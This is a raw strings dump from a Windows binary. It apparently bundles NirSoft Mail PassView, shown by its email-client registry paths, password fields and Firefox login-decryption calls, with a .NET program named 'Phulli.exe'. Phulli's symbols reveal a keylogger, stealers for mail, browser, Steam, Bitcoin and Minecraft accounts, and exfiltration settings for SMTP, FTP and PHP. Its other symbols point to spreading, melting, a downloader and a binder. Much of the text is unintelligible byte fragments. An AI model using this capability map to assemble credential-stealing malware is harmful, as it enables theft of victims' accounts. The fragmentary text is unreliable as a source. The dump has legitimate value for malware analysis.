F$S3
F4;
 3A
PQh@4A
h84A
GX^
SVW
F<3
YYtZ
_^[
VW3
Yt*3
~-3
Y_^
Rp=
YYf
_^[t
trW
jh@
Vh0
It!
R|j
j X[
t99}
u4SV
YYt
WWh2
Y~*S
[_^]
QQV
QSW3
P<P
L$ 
vPW
YYt
_[Y
QSV
9^(W~0
C;^(|
f9H
QWh
9~(~I
C;^(|
t)9
_^[
9^(W~&
C;^(|
_^[
uSh
v(P
QS3
9^@Wt
9^(~
u3C;^(|
P`P
P`P
YY2
8 u
_@8
8\u
_@8
8/u
_@8
9~ ~D
G;~ |
YY_
SWj2
j=P
9^ ~B
C;^ |
 W3
9{ 
j,V
YYu
j"V
YYu
<"u
f$A
C H9E
;C 
YY_
9~ ~SS
vPS
G;~ |
YY_
`VWj
9s YY
QWV
 F;s 
YY_^
VWh
j13
hP2A
h`2A
9s YY
YYPh
;C 
9_ YY~uVh
wLV
wPPh
C;_ |
YY[
SVW
_^[
$kA
9N 
A;N |
v W
P P
P P
t#W3
~?S
t&S
_^[
f$A
t"S3
9^(~A
C;^(|
Plf
9D$
SVW
_^[
VW3
G;}
SWj
( A
$ A
4 A
QQS
( A
=$ A
t,j
t,j
j j 
`"A
D$(
d"A
=, A
=D A
_^][YY
_^[
^[t
F;5
,0<
wFA
Ys4
;C 
~b3
uc3
~V3
YY}
GWhI
WhI
WhY
WhY
QWj
PhL
QhF
~,Pj
SSj
 "A
_[^
 "A
SVW
9Y0~K
YYu'
F;q0|
uE9
w(h
P`P
PdP
_^[
$"A
PPP
@Pj
("A
SVW
E(N
]/3
E<V
]C3
EPB
jf^
}pP
hf$A
  A
MlQj
SSSjh
`"A
jpj
QPSj
8 A
SSh
PSh
Eh~'
Mtu
4 A
jh^
9X0~
f$A
YYu
hH4A
 "A
`vA
`vA
h`vA
j0Y
h!A
E`Pj
E`,
_^[
SVh
txt
YYj
 !A
t"A
t!A
VWj
 "A
t"A
_t>
PjiX
@5A
 "A
SVW
j.P
YYt
h 4A
h(4A
h04A
_^[
YY_^
l!A
SVW3
f9}
|$<
D$0`5A
@$A
D$4PjpX
 "A
D$0
|$(
_^[
QQSV
\"A
4"A
p!A
uAh
@$A
u0VVh#
VjO
L"A
90u
VVh
t!A
_^[
SVW
+t*
P A
H A
@ A
X!A
PPh
t!A
P!A
 "A
 "A
_^[
WWh
WWh
hX$A
hh4A
l5A
D A
YYu
YYu
YYu
YYu
YYu
YYu
QSV
9X0~
f$A
YYu
vaS
f$A
SVW
\$`
D$8 
|$0
|$<
|$4
|$@
(kA
hH4A
D3"
j0h
|$`
D$dl5A
D A
t$`
D$`
`!A
WWW
D$PP
5\!A
D$DP
L$DQP
D$DP
D$DP
d!A
D$DP
T!A
WWW
D$PP
D$dl5A
D A
D$`t$A
t$0
_^[
#Eg
vT2
?t0j@_+
@r*
@Ou
_^[]
j?Y#
s&WQj
j8j
p $
>QZ^&
x,3
;"a
3eV
D")
Y[e
SV3
ht0A
YYu
YYu
_^[
ht0A
~,+
VPS
SVht0A
Y~^h
SVW
YYu
YYu
YYu
YYu
YYu
YYu
YYu
YYu
YYu
Yh$6A
YYu
Yh06A
YYu>
YYs
^@[
W~B
YYtw
YYtbC;
_^[
98t?
hH6A
t)9^
hT6A
h\6A
hl6A
89F
YYt"3
YYu
8~t
Y_3
^@[
SVW
<~u
CL;
Y_^[
SVW
w0P
SSV
PSh
YY9]
YY9]
YY9]
YY9]
YY9]
YY9]
YYu-
YY3
Y9]
F P
d A
_^[
SVW
u:S
$ 7A
h 7A
$,7A
h,7A
h<7A
YYt
_^[
hD7A
hH7A
YYu!
VVhd7A
@9E
t*9}
PWj
9x0
0kA
hwA
@@;
hwA
tKWW
p0S
PWh
PPS
_^[
SV3
\$ 
9\$0
PSV
T$D
9\$
9^0
D$=SP
\$D
SSW
D$DPj
D$<h08A
uxSSW
v%SSW
@;D$
T$,
_^[
ShD8A
PWShd8A
t$ 
D$<P
D$<PSht8A
t$(
D$0
D$$j@
D$<
D$,^
D$0P
D$,P
t$8
|$<
s<V
D$<WP
D$|
t$$P
D$(
D$@P
t$ 
_^[
SVWt
SSh
SSW
|8A
SPf
x A
5t A
5dlA
YYSh
5XlA
t{h
5|nA
p A
YYt;h
5XlA
5dlA
5TlA
5<lA
5@lA
5HlA
5LlA
5DlA
5PlA
5|nA
5pnA
 "A
_^3
6hpnA
SUV
5l A
Wht%A
hh%A
hD9A
_^][
F PS
h A
d A
ht%A
ht%A
l A
hT9A
h`9A
hp9A
uzWh`0A
l A
tgV
tNh
t=h
t,h
lnA
h :A
Wh0:A
twV
h<:A
tNhP:A
t=hd:A
t,h|:A
j:P
YYt
HPW
Y|Ch
>\uEh
YY[
SVW3
_^[
9L$
9T$
s!h
D$ 
D$(
D$,
D$t
D$0
D$pPS
D$HP
X"A
D$tP
D$LP
D$P+D$H
\$x
+\$t
D$,
+D$x
D$\
D$X+D$P
D$8
,"A
!D$,9
t$(
T A
;D$
D$,
L$,
)D$0
D$P
@"A
L$ 
L$ 
L$$
L$$
t$X
D$x
t$|
t$0h
D$4P
t$,
D$T
t$T
t$4h
t$H
t$ 
D$4
L$8QP
D$8
D$<P
X"A
D$\P
+D$<
+D$`h
D$H
D$l
D$l+D$d@P3
PPP
D$\P
D$<
L$D+
+D$Dh
+D$dAQ
L$H+L$@AQ
L$t
t$Hj
t$H
(uP
YtCj
P A
d"A
X A
H A
1RQ
VD^]
50!A
j~^V
50!A
h8;A
Ph`;A
t9h
VPhf$A
YY^[
PPP
^@[]
teWV
vSV
tEP
F;u
@^]
= uA
u%h
 uA
Bt9HHt.
t"Ht
u8h,<A
Nh4<A
GhL<A
@h <A
9h@<A
2hT<A
t!Ht
hx<A
hh<A
SVWS
Ht'HuC
8!A
8\u
<!A
@!A
8!A
PVC
VWh
SVWj
<<u
U<>u
I<"u
h =A
<&u
h(=A
Wh0=A
_^[
tzh
YY~"P
YY9_
YYt
YY9]
hP2A
h >A
hL>A
hX>A
_^[
SVW
h%A
SVW
Pht>A
j\P
YY~)
YYuFWVh
h A
9^$W
l A
F$u/j
h%A
l A
F$u
F$;
h4?A
hH?A
hX?A
F 3
@_[
h?A
p?A
t?A
x?A
 @A
(@A
0@A
8@A
@@A
H@A
P@A
X@A
`@A
h@A
p@A
x@A
 AA
(AA
0AA
8AA
@AA
HAA
PAA
XAA
`AA
hAA
pAA
xAA
 BA
(BA
0BA
8BA
@BA
HBA
PBA
XBA
`BA
hBA
pBA
xBA
t2G
<;t|B
PPj
<;t
~)WR
t5< w1;]
SWV
YYt
~ GW
:A}
SW+
;@R
hf$A
<"t
<'u
SUV3
9_4t0
'u=
G(3
9w(
9w4
9wD
rz+
9w@t)
X9G$
9w0t(
9w0u
9w8t,
9t$
>u-9w(u(
_^][
Y9O$uB
 v%
/t8
>t3
\8M
D8N
9t$
 v)
/t$
AMP
SSW
SUVW
YYu
YYu
YYu
YYu
Yh$CA
YYu"
h4CA
YYu"
hDCA
YYu"
hTCA
YYu"
hdCA
YYu
htCA
YYu
YYu
YYu
YYu
YYu0
YYu
YYt"h
YYt
YYu
YYu
YYt"h,DA
YYt
hDDA
YYu
_^3
]@[
SVW
YY3
SSVPj
tC9
t;8
_^[
tdSV3
YSSj
^[]
h\DA
hD7A
SVW
hhDA
8\u
YYt
_^[
<_u
<.u
<.u
<.u
<.u
:-tI
-t<
SVW3
Pj(X
(;M
9\$
< s
~Ch
9\$
YY3
_@[
SVW3
FIu
%,#A
%d#A
%`#A
%\#A
=p{A
hl{A
hp{A
%X#A
%T#A
%P#A
%L#A
%H#A
%D#A
%@#A
%<#A
%(#A
%$#A
% #A
%0#A
jph
=l A
8MZu
9PE
p#A
l{A
p{A
l#A
h#A
8#A
h{A
|#A
>"u:F
<"u
>"u
< v
> v
XPVSS
4#A
SVW
Y_^[
%t#A
%x#A
(uA
0uA
,uA
4uA
%2.2X
MS Sans Serif
Mail PassView
Mozilla\Profiles
Thunderbird\Profiles
current
Software\Qualcomm\Eudora\CommandLine
Software\Classes\Software\Qualcomm\Eudora\CommandLine\current
Software\Mozilla\Mozilla Thunderbird
%s\Main
Install Directory
sqlite3.dll
nss3.dll
%programfiles%\Mozilla Thunderbird
ShowGridLines
SaveFilterIndex
AddExportHeaderLine
MarkOddEvenRows
%s  %s  %s
POP3 User Name
IMAP User Name
HTTPMail User Name
SMTP USer Name
POP3 Server
IMAP Server
HTTPMail Server
SMTP Server
POP3 Password2
IMAP Password2
HTTPMail Password2
SMTP Password2
POP3 Port
IMAP Port
HTTPMail Port
SMTP Port
POP3 Secure Connection
IMAP Secure Connection
HTTPMail Secure Connection
SMTP Secure Connection
SMTP Display Name
SMTP Email Address
POP3 Password
IMAP Password
HTTP Password
SMTP Password
POP3 User
IMAP User
HTTP User
SMTP User
HTTP Server URL
HTTP Port
POP3 Use SPA
IMAP Use SPA
HTTPMail Use SSL
SMTP Use SSL
Display Name
Email
Identities
Username
Software\Microsoft\Internet Account Manager\Accounts
%s\%s
Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
DisplayName
EmailAddress
PopAccount
PopServer
PopPort
PopLogSecure
PopPassword
SMTPAccount
SMTPServer
SMTPPort
SMTPLogSecure
SMTPPassword
Software\IncrediMail\Identities
Identity
%s\Accounts
Settings
UsesIMAP
LoginName
RealName
ReturnAddress
SavePasswordText
Personalities
Server Details
ESMTPUsername
ESMTPPassword
POP3Server
POP3Username
POP3Password
InstallPath
Software\Group Mail
fb.dat
%s@gmail.com
%s@yahoo.com
"Account","Login Name","Password","Web Site","Comments"
www.google.com/Please log in to your Gmail account
www.google.com:443/Please log in to your Gmail account
www.google.com/Please log in to your Google Account
www.google.com:443/Please log in to your Google Account
Software\Microsoft\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Software\Microsoft\Office\15.0\Outlook\Profiles
<meta http-equiv='content-type' content='text/html;charset=%s'>
<table dir="rtl"><tr><td>
<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>
</table>
www.google.com
pop3
imap
smtp
!"@
xB@
}B@
GB@
OB@
=<@
.;@
UB@
R:@
?:@
?:@
'6@
l5@
advapi32.dll
CredReadA
CredFree
CredDeleteA
CredEnumerateA
CredEnumerateW
Cry
comctl32.dll
InitCommonControlsEx
Error
Error: Cannot load the common control classes.
*.ini
ini
dZ@
netmsg.dll
Unknown Error
Error %d: %s
edit
kernel32.dll
open
%2.2X 
%s (%s)
POP3_credentials
POP3_name
POP3_host
Software\Google\Google Desktop\Mailboxes
Software\Google\Google Talk\Accounts
Microsoft_WinInet
caption
menu_%d
dialog_%d
strings
general
sysdatetimepick32
rtl
charset
TranslatorName
TranslatorURL
_lng.ini
%-18s: %s
%%-%d.%ds 
<td bgcolor=#%s nowrap>%s
<td bgcolor=#%s>%s
<tr>
&nbsp;
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
 bgcolor="%s"
<table border="1" cellpadding="5">
 nowrap
<font color="%s">%s</font>
</table><p>
<item>
<%s>%s</%s>
</item>
<?xml version="1.0"  encoding="ISO-8859-1" ?>
<%s>
</%s>
/sort
/nosort
SysListView32
/noloadsettings
report.html
commdlg_FindReplace
*.txt
*.htm;*.html
*.xml
*.csv
.cfg
General
WinPos
Sort
Columns
Software\NirSoft\MailPassView
MailPassView
Arial
/stext
/shtml
/sverhtml
/sxml
/stab
/scomma
/stabular
/skeepass
/savelangfile
/deleteregkey
Failed to load the executable file !
user_pref("
mail.account.account
server
identities
mail.server
username
type
hostname
port
useSecAuth
true
mail.identity
useremail
fullname
signon.signonfilename
mailbox://
imap://
mailbox://%s@%s
imap://%s@%s
SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
mailbox://%s
imap://%s
signons.txt
signons.sqlite
none
*.*
prefs.js
Password.NET Messenger Service
User.NET Messenger Service
Software\Microsoft\MSNMessenger
Software\Microsoft\MessengerService
Passport.Net\*
Creds
ps:password
WindowsLive:name=*
windowslive:name=
Software\Microsoft\IdentityCRL
Dynamic Salt
Value
{Unknown}
Exception %8.8X at address %8.8X in module %s
Registers: 
EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X
ESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X
EIP=%8.8X
Stack Data: %s
Code Data: %s
mozsqlite3.dll
NSS_Init
NSS_Shutdown
PK11_GetInternalKeySlot
PK11_FreeSlot
PK11_CheckUserPassword
PK11_Authenticate
PK11SDR_Decrypt
CreateToolhelp32Snapshot
Module32First
Module32Next
Process32First
Process32Next
psapi.dll
GetModuleBaseNameA
EnumProcessModules
GetModuleFileNameExA
EnumProcesses
GetModuleInformation
\systemroot
STATIC
EDIT
%s:
pstorec.dll
PStoreCreateInstance
5e7e8100-9138-11d1-945a-00c04fc308ff
00000000-0000-0000-0000-000000000000
220D5CD0-853A-11D0-84BC-00C04FD43F8F
220D5CD1-853A-11D0-84BC-00C04FD43F8F
220D5CC1-853A-11D0-84BC-00C04FD43F8F
417E2D75-84BD-11D0-84BB-00C04FD43F8F
shell32.dll
SHGetSpecialFolderPathA
AppData
Favorites
Desktop
Start Menu
Programs
Startup
Common Start Menu
Common Programs
Common Desktop
Common Startup
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
SHAutoComplete
%2.2X%2.2X%2.2X
&lt;
&gt;
&quot;
&deg;
&amp;
<br>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>%s<title>%s</title></head>
<body>
%s <h3>%s</h3>
</body></html>
<font
 size="%d"
 color="#%s"
<b>
</b>
</font>
<font color="%s">
<table border="1" cellpadding="5"><tr%s>
 width="%s"
<th%s>%s%s%s
</table>
SOFTWARE\Mozilla
mozilla
%s\bin
PathToExe
\sqlite3.dll
\mozsqlite3.dll
sqlite3_open
sqlite3_prepare
sqlite3_step
sqlite3_column_text
sqlite3_column_int
sqlite3_column_int64
sqlite3_finalize
sqlite3_close
sqlite3_exec
amp;
lt;
gt;
quot;
nbsp;
apos;
iexcl;
cent;
pound;
curren;
yen;
brvbar;
sect;
uml;
copy;
ordf;
laquo;
not;
shy;
reg;
macr;
deg;
plusmn;
sup2;
sup3;
acute;
micro;
para;
middot;
cedil;
sup1;
ordm;
raquo;
frac14;
frac12;
frac34;
iquest;
Agrave;
Aacute;
Acirc;
Atilde;
Auml;
Aring;
AElig;
Ccedil;
Egrave;
Eacute;
Ecirc;
Euml;
Igrave;
Iacute;
Icirc;
Iuml;
ETH;
Ntilde;
Ograve;
Oacute;
Ocirc;
Otilde;
Ouml;
times;
Oslash;
Ugrave;
Uacute;
Ucirc;
Uuml;
Yacute;
THORN;
szlig;
agrave;
aacute;
acirc;
atilde;
auml;
aring;
aelig;
ccedil;
egrave;
eacute;
ecirc;
euml;
igrave;
iacute;
icirc;
iuml;
eth;
ntilde;
ograve;
oacute;
ocirc;
otilde;
ouml;
divide;
oslash;
ugrave;
uacute;
ucirc;
uuml;
yacute;
thorn;
yuml;
A}A}A
Software\Microsoft\Windows Mail
Software\Microsoft\Windows Live Mail
Salt
Account_Name
POP3_Server
IMAP_Server
NNTP_Server
SMTP_Server
POP3_User_Name
IMAP_User_Name
NNTP_User_Name
SMTP_User_Name
POP3_Password2
IMAP_Password2
NNTP_Password2
SMTP_Password2
NNTP_Email_Address
SMTP_Email_Address
SMTP_Port
NNTP_Port
IMAP_Port
POP3_Port
SMTP_Secure_Connection
NNTP_Secure_Connection
IMAP_Secure_Connection
POP3_Secure_Connection
*.oeaccount
\Microsoft\Windows Mail
\Microsoft\Windows Live Mail
Store Root
Software\Yahoo\Pager
Yahoo! User ID
EOptions string
salu
?RSDS
f:\Projects\VS2005\mailpv\Release\mailpv.pdb
strcat
sprintf
strncat
strlen
memset
strcpy
_ultoa
abs
_purecall
strchr
_mbscmp
wcsstr
_strcmpi
log
atoi
_mbsicmp
memcpy
??2@YAPAXI@Z
??3@YAXPAX@Z
_stricmp
strrchr
_memicmp
malloc
strcmp
strtoul
memcmp
modf
free
_strnicmp
wcsncmp
wcschr
wcslen
_itoa
_strlwr
qsort
strncmp
_mbsnbicmp
_snprintf
_mbsrchr
msvcrt.dll
__dllonexit
_onexit
_c_exit
_exit
_XcptFilter
_cexit
exit
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
_except_handler3
ImageList_ReplaceIcon
ImageList_AddMasked
ImageList_Create
ImageList_SetImageCount
CreateToolbarEx
COMCTL32.dll
UuidFromStringA
RPCRT4.dll
GetPrivateProfileStringA
MultiByteToWideChar
WideCharToMultiByte
ExpandEnvironmentStringsA
LocalFree
WriteFile
GetPrivateProfileSectionA
FreeLibrary
GetProcAddress
LoadLibraryA
GlobalLock
GlobalUnlock
CreateFileA
GetFileSize
GetModuleFileNameA
FindNextFileA
FindFirstFileA
LoadLibraryExA
SetFilePointer
GetLastError
GetFileAttributesA
GetTempFileNameA
FindClose
FormatMessageA
GetWindowsDirectoryA
ReadFile
GetVersionExA
CloseHandle
GetTempPathA
GlobalAlloc
GetComputerNameA
GetPrivateProfileIntA
WritePrivateProfileStringA
EnumResourceNamesA
GetStdHandle
DeleteFileA
ExitProcess
GetCurrentProcess
ReadProcessMemory
GetCurrentProcessId
GetModuleHandleA
GetCurrentDirectoryA
SetCurrentDirectoryA
OpenProcess
FindResourceA
LoadResource
EnumResourceTypesA
SizeofResource
LockResource
GetStartupInfoA
KERNEL32.dll
SetCursor
ChildWindowFromPoint
LoadCursorA
GetSysColorBrush
ShowWindow
GetDlgItem
CreateWindowExA
InvalidateRect
SetDlgItemInt
BeginPaint
GetClientRect
GetWindow
SetDlgItemTextA
DrawFrameControl
GetDlgItemTextA
SendDlgItemMessageA
SetWindowTextA
GetWindowRect
GetSystemMetrics
GetDlgItemInt
DeferWindowPos
EndPaint
EndDialog
GetWindowPlacement
RegisterClassA
UpdateWindow
SetMenu
LoadAcceleratorsA
SetWindowPos
DefWindowProcA
TranslateAcceleratorA
MessageBoxA
SendMessageA
LoadIconA
GetWindowLongA
SetWindowLongA
SetFocus
BeginDeferWindowPos
EndDeferWindowPos
GetDC
EmptyClipboard
GetSubMenu
MoveWindow
EnableMenuItem
ReleaseDC
CheckMenuItem
GetMenuItemCount
GetMenuStringA
SetClipboardData
EnableWindow
MapWindowPoints
GetCursorPos
LoadImageA
GetSysColor
GetClassNameA
CloseClipboard
GetMenu
OpenClipboard
EnumChildWindows
GetMenuItemInfoA
GetWindowTextA
LoadMenuA
GetParent
LoadStringA
CreateDialogParamA
ModifyMenuA
DestroyWindow
DialogBoxParamA
GetDlgCtrlID
DestroyMenu
PostMessageA
TrackPopupMenu
PostQuitMessage
RegisterWindowMessageA
TranslateMessage
GetMessageA
IsDialogMessageA
DrawTextExA
DispatchMessageA
GetFocus
USER32.dll
SetBkMode
CreateFontIndirectA
SetTextColor
DeleteObject
SelectObject
GetDeviceCaps
SetBkColor
GetTextExtentPoint32A
GDI32.dll
GetSaveFileNameA
GetOpenFileNameA
FindTextA
comdlg32.dll
RegCloseKey
GetUserNameA
RegDeleteKeyA
RegOpenKeyExA
RegEnumKeyA
RegQueryValueExA
RegEnumKeyExA
ADVAPI32.dll
ShellExecuteA
SHBrowseForFolderA
SHGetMalloc
SHGetPathFromIDListA
SHELL32.dll
CoInitialize
CoUninitialize
CoTaskMemFree
ole32.dll
%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd
f$A
f$A
@@ 
@@ 
@ @
@@ 
@@ 
@@ 
@@ 
@@ 
@@ 
abe2869f-9b47-4cd9-a358-c22904dba7f7
82BD0E67-9FEA-4748-8672-D5EFE5B779B0
wwwwwp
wwwwwwwwwwwwwwwwwwww~gww
wwwwwwwwwwwwwwN
www
wwwwww~fww
wwwww
wwp
www
www
wwwp
w~f`
wxwwN
www
wwwwpw~fhw
{{{{
wwwwp
fhw
""'
wwww`
fhw
r/fw
{{{x
wwwwww
wwww
`hw
fhw
fhw
vo"
Gww
fhw
""'
wwww
Gww
fhw
wwx
wwwwwwp
Gww
wwwx
wwwwwwww
Gwwp
xpwwwx
pwwwwx
wwwwwwwwwwwp
Gwwp
wwwwwwwwwwwx
wwwwwwwwwwwwwwwwwwwwwwww
wwwwwwwwwww(
wwwx
wwwwwwwwwwwwwwp
zzzp
zzww
""""" 
3?;
wp3
"""
{{{{
&File
Select &Folders
&Save Selected Items
Ctrl+S
&Properties
Alt+Enter
E&xit
&Edit
&Find
Ctrl+F
&Copy Selected Items
Ctrl+C
Copy Password
Ctrl+P
Select &All
Ctrl+A
Deselect All
Ctrl+D
&View
Show &Grid Lines
Add Header Line To CSV/Tab-Delimited File
Mark Odd/Even Rows
&HTML Report - All Items
HTML R&eport - Selected Items
Choose Colum&ns
&Auto Size Columns
Ctrl+Plus
&Refresh
&Help
&About
Popup1
&Save Selected Items
Ctrl+S
&Copy Selected Items
Ctrl+C
Copy Password
Ctrl+P
HTML Report - All Items
HTML Report - Selected Items
Choose Colum&ns
&Auto Size Columns
Ctrl+Plus
&Properties
Alt+Enter
&Refresh
Properties
MS Sans Serif
Exception !
MS Sans Serif
Copy Exception
_hP
Continue
Terminate Application
The following application error has occurred:
If this problem persists, copy the above exception information to the clipboard, and send it to the author of this software.
Select Folders / Files
MS Sans Serif
ThunderBird Profiles:
Browse...
ThunderBird 3 Installation:
Browse...
Netscape Folder:
Browse...
Eudora INI File:
Browse...
Default
Cancel
MS Sans Serif
(-v
Translation:
Column Settings
MS Shell Dlg
SysListView32
Move &Up
Move &Down
&Show
&Hide
Default
Cancel
Check the columns that you would like to make visible. Use the Move Up and Move Down buttons to reorder the columns
Width of selected column (in pixels):
%d items
, %d Selected
Created by using
Select a filename to save
Email Accounts List
Select base folder of Netscape!Select base folder of ThunderBird
Select Eudora.ini filename/Select the location of Thunderbird installation
Loading... %d
Yes
Text Files
Tab delimited text file
Tabular Text File
HTML File - Horizontal
HTML File - Vertical
XML File
Comma delimited text file
KeePass csv file
Eudora.ini file
POP3
IMAP
HTTP
SMTP
NNTP
Outlook Express
IncrediMail
Eudora
Group Mail Free
MS Outlook
MS Outlook 2002/2003/2007/2010
Gmail
Hotmail/MSN
Yahoo! Mail
Netscape Mail
Thunderbird
Google Desktop
Windows Mail
Windows Live Mail
Outlook 2013
Name
Application
Email
Server
Type
User
Password
Profile
Server Port
Secured
Password Strength
SMTP Server
SMTP Server Port
Very Weak
Weak
Medium
Strong
Very Strong
VS_VERSION_INFO
StringFileInfo
040904b0
CompanyName
NirSoft
FileDescription
Mail Password Recovery
FileVersion
1.80
InternalName
Mail PassView
LegalCopyright
Copyright 
 2003 - 2013 Nir Sofer
OriginalFilename
mailpv.exe
ProductName
Mail PassView
ProductVersion
1.80
VarFileInfo
Translation
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="NirSoft" type="win32"></assemblyIdentity><description>NirSoft</description><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency></assembly>PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
BSJB
v2.0.50727
#Strings
#US
#GUID
#Blob
*#2
,(s
G(s
`(/
))s
Y$c$I
" '
+ '
4 '
< '
J '
Q '
X '
^ '
e '
l '
v '
#!'
-!'
7!'
A!'
K!'
U!'
_!'
i!'
s!'
}!'
""'
&"'
*"'
."'
2"'
6"'
:"'
>"'
B"'
F"'
J"'
N"'
R"'
V"'
Z"'
e"'
7#Q
 G#U
 a#n
 {#Z
4$"
m&p
 ('
 I'
 ^'
 r' 
'(s
/&@
`&i
=$4
y&u
Phulli.exe
Phulli
mscorlib
Microsoft.VisualBasic
System.Windows.Forms
System
System.Drawing
System.Management
user32
tapi32.dll
rtm.dll
user32.dll
kernel32
ntdll
Phulli.Resources.resources
Phulli.Form1.resources
<Module>
MyApplication
Phulli.My
WindowsFormsApplicationBase
Microsoft.VisualBasic.ApplicationServices
__ENCList
List`1
System.Collections.Generic
WeakReference
.ctor
.cctor
DebuggerNonUserCodeAttribute
System.Diagnostics
Monitor
System.Threading
Enter
get_Count
get_Capacity
get_Item
get_IsAlive
set_Item
RemoveRange
set_Capacity
RuntimeHelpers
System.Runtime.CompilerServices
GetObjectValue
Add
Exit
__ENCAddToList
value
get_UseCompatibleTextRendering
Application
SetCompatibleTextRenderingDefault
Run
Main
Args
EditorBrowsableAttribute
System.ComponentModel
EditorBrowsableState
STAThreadAttribute
DebuggerHiddenAttribute
AuthenticationMode
set_IsSingleInstance
set_EnableVisualStyles
set_SaveMySettingsOnExit
set_ShutdownStyle
ShutdownMode
DebuggerStepThroughAttribute
set_MainForm
Form
OnCreateMainForm
GeneratedCodeAttribute
System.CodeDom.Compiler
MyComputer
Computer
Microsoft.VisualBasic.Devices
MyProject
Object
m_ComputerObjectProvider
m_AppObjectProvider
m_UserObjectProvider
User
m_MyFormsObjectProvider
m_MyWebServicesObjectProvider
get_GetInstance
get_Computer
get_Application
get_User
get_Forms
get_WebServices
HelpKeywordAttribute
System.ComponentModel.Design
Forms
WebServices
StandardModuleAttribute
Microsoft.VisualBasic.CompilerServices
HideModuleNameAttribute
MyForms
m_Form1
m_FormBeingCreated
Hashtable
System.Collections
ThreadStaticAttribute
get_Form1
ArgumentException
set_Form1
Value
TargetInvocationException
System.Reflection
Control
get_IsDisposed
Type
GetTypeFromHandle
RuntimeTypeHandle
ContainsKey
String
Utils
GetResourceString
InvalidOperationException
Activator
CreateInstance
ProjectData
SetProjectError
Exception
get_InnerException
get_Message
ClearProjectError
Remove
Create__Instance__
Instance
Component
Dispose
Dispose__Instance__
instance
Equals
GetHashCode
GetType
ToString
Form1
MyGroupCollectionAttribute
MyWebServices
ThreadSafeObjectProvider`1
m_ThreadStaticValue
CompilerGeneratedAttribute
GetInstance
ComVisibleAttribute
System.Runtime.InteropServices
components
IContainer
encryptedemailstring
encryptedpassstring
encryptedsmtpstring
portstring
timerstring
fakemgrstring
encryptedftphost
encryptedftpuser
encryptedftppass
encryptedphplink
useemail
useftp
usephp
delaytime
clearie
clearff
binder
downloader
websitevisitor
websiteblocker
notify
DisableSSL
fakerror
startup
screeny
clip
TaskManager
logger
stealers
melt
reg
cmd
misconfig
spreaders
steam
screenynumber
Minecraftt
Pinsst
Bitcoinst
path
meltLocation
appname
CLog
_CH
AccessedThroughPropertyAttribute
emailstring
passstring
smtpstring
ftphost
ftpuser
ftppass
phplink
ExIP
LHeader
RHeader
Shift
Caps
UseCaps
BackSpace
WM_KEYUP
WM_KEYDOWN
WM_SYSKEYDOWN
WM_SYSKEYUP
KeyboardHandle
LastCheckedForegroundTitle
callback
KeyLog
Holder
Mail
InternalIp
MyAV
MyFirewall
mem
CleanedPasswordsMAIL
CleanedPasswordsWB
EventHandler
add_Load
Path
System.IO
GetTempPath
Environment
GetFolderPath
SpecialFolder
Concat
get_ExecutablePath
GetFileName
Empty
IntPtr
op_Explicit
WindowsIdentity
System.Security.Principal
GetCurrent
get_Name
Char
Split
IDisposable
disposing
SizeF
Size
SuspendLayout
ContainerControl
set_AutoScaleDimensions
set_AutoScaleMode
AutoScaleMode
set_ClientSize
set_FormBorderStyle
FormBorderStyle
set_MaximizeBox
set_MinimizeBox
set_Name
set_Opacity
set_ShowIcon
set_ShowInTaskbar
set_WindowState
FormWindowState
ResumeLayout
InitializeComponent
get_CH
set_CH
WithEventsValue
UnhookWindowsHookEx
hHook
SetWindowsHookEx
idHook
lpfn
hmod
dwThreadId
SetWindowsHookExA
GetAsyncKeyState
vKey
CallNextHookEx
nCode
wParam
lParam
lineSetAppSpecific
hCall
dwAppSpecific
MgmGetNextMfeStats
pimmStart
pdwBufferSize
pbBuffer
pdwNumEntries
GetForegroundWindow
GetWindowText
hwnd
lpString
cch
GetWindowTextA
Strings
InStr
CompareMethod
Substring
GetActiveWindowTitle
op_Inequality
Boolean
Hooked
Process
GetCurrentProcess
get_MainModule
ProcessModule
get_BaseAddress
HookKeyboard
Conversions
ToBoolean
UnhookKeyboard
DateTime
Operators
ConditionalCompareObjectNotEqual
ConcatenateObject
DateAndTime
get_Now
get_Keyboard
Keyboard
get_CtrlKeyDown
get_AltKeyDown
ChrW
CompareString
ToUpper
get_CapsLock
EndsWith
get_Length
ToInteger
KeyboardCallback
Code
ProcessStartInfo
set_UseShellExecute
get_CurrentDirectory
set_WorkingDirectory
set_FileName
set_Verb
Start
EndApp
RestartElevated
Thread
IEnumerator`1
Sleep
File
Exists
Delete
WriteAllText
Copy
ServerComputer
get_FileSystem
FileSystemProxy
Microsoft.VisualBasic.MyServices
ReadAllText
DeleteFile
get_Id
Int32
ThreadStart
SetApartmentState
ApartmentState
Trim
IsNullOrEmpty
Convert
FromBase64String
WriteAllBytes
get_Network
Network
DownloadFile
Directory
GetFiles
GetDirectories
ReadOnlyCollection`1
System.Collections.ObjectModel
GetEnumerator
get_Current
Contains
IEnumerator
MoveNext
get_NewLine
AppendAllText
Interaction
MsgBox
MsgBoxResult
MsgBoxStyle
Form1_Load
EventArgs
sender
GetProcessesByName
Kill
ForceSteamLogin
MethodInfo
Assembly
Load
get_EntryPoint
IsDotNet
Bytes
